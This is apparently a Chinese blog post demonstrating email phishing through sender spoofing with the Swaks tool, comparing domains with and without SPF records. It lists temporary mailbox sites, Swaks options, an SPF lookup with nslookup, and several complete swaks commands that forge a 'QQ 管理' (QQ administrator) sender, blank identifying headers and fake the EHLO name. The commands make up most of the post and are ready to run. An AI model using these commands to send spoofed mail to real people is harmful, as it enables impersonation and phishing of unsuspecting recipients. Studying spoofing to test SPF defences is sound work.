邮件钓鱼--有无SPF演示--Swaks

目录

临时邮箱网址:

[Swaks 简单使用说明:(kali自带)](#Swaks 简单使用说明:(kali自带))

操作流程:

无SPF:(直接伪造发信人)

演示1

演示2

演示3

​编辑

有SPF:--演示


临时邮箱网址:

http://24mail.chacuo.net/

https://www.linshi-email.com/


Swaks 简单使用说明:(kali自带)

-t --to 目标地址 -t [email protected]

-f --from 来源地址 (发件人) -f "text<[email protected]>"

--protocol 设定协议(未测试)

--body "http://www.baidu.com" //引号中的内容即为邮件正文;

--header "Subject:hello" //邮件头信息,subject 为邮件标题

-ehlo 伪造邮件 ehlo 头

--data ./Desktop/email.txt //将 TXT 文件作为邮件发送;


操作流程:

1、检测:

nslookup -type=txt xxx.com

2、伪造:

swaks ...............


无SPF:(直接伪造发信人)

演示1

复制代码
swaks --header-X-Mailer "" --header-Message-Id "" --header-"Content-Type"="text/html" --from "QQ 管理<[email protected]>" --ehlo shabimeiguo -header "Subject: 测试" --body 我们做了一个测试 --to [email protected]

---直接伪造发信人

演示2

复制代码
swaks --header-X-Mailer "" --header-Message-Id "" --header-"Content-Type"="text/html" --from "QQ 管理<[email protected]>" --ehlo shabimeiguo -header "Subject: 测试" --body 我们做了一个测试 --to [email protected]

演示3

复制代码
swaks --header-X-Mailer "" --header-Message-Id "" --header-"Content-Type"="text/html" --from "QQ 管理<[email protected]>" --ehlo shabimeiguo -header "Subject: 测试" --body 我们做了一个测试 --to [email protected]

有SPF:--演示

复制代码
swaks --header-X-Mailer "" --header-Message-Id "" --header-"Content-Type"="text/html" --from "" --ehlo shabimeiguo -header "Subject: 测试" --body 我们做了一个测试 --to [email protected]

相关推荐
小李不想说话14 分钟前
HTTPS 加密原理
java·网络·网络协议·学习·安全·http·https
若初&1 小时前
文件上传Ⅲ
前端·web安全
若愚67921 小时前
前端取经路——前端安全:构建坚不可摧的Web应用防线
前端·安全
martian6652 小时前
医学影像系统性能优化与调试技术:深度剖析与实践指南
开发语言·系统安全·dicom
禾木KG3 小时前
网络安全-等级保护(等保) 2-5-1 GB/T 25070—2019 附录B (资料性附录)第三级系统安全保护环境设计示例
网络安全
云手机管家4 小时前
账号风控突破:云手机设备指纹篡改检测与反制技术解析
android·运维·网络协议·网络安全·智能手机·矩阵·自动化
雪兽软件5 小时前
2025 年十大网络安全预测
web安全·数据安全
木下-俱欢颜13 小时前
搭建基于chrony+OpenSSL(NTS协议)多层级可信时间同步服务
运维·网络安全·udp·ssl
Le_ee13 小时前
sqli-labs靶场第七关——文件导出注入
数据库·sql·网络安全·php·sql注入·sqli—labs
mooyuan天天15 小时前
DVWA靶场通关笔记-SQL注入(SQL Injection Medium级别)
web安全·渗透测试·sql注入·sql注入漏洞·dvwa靶场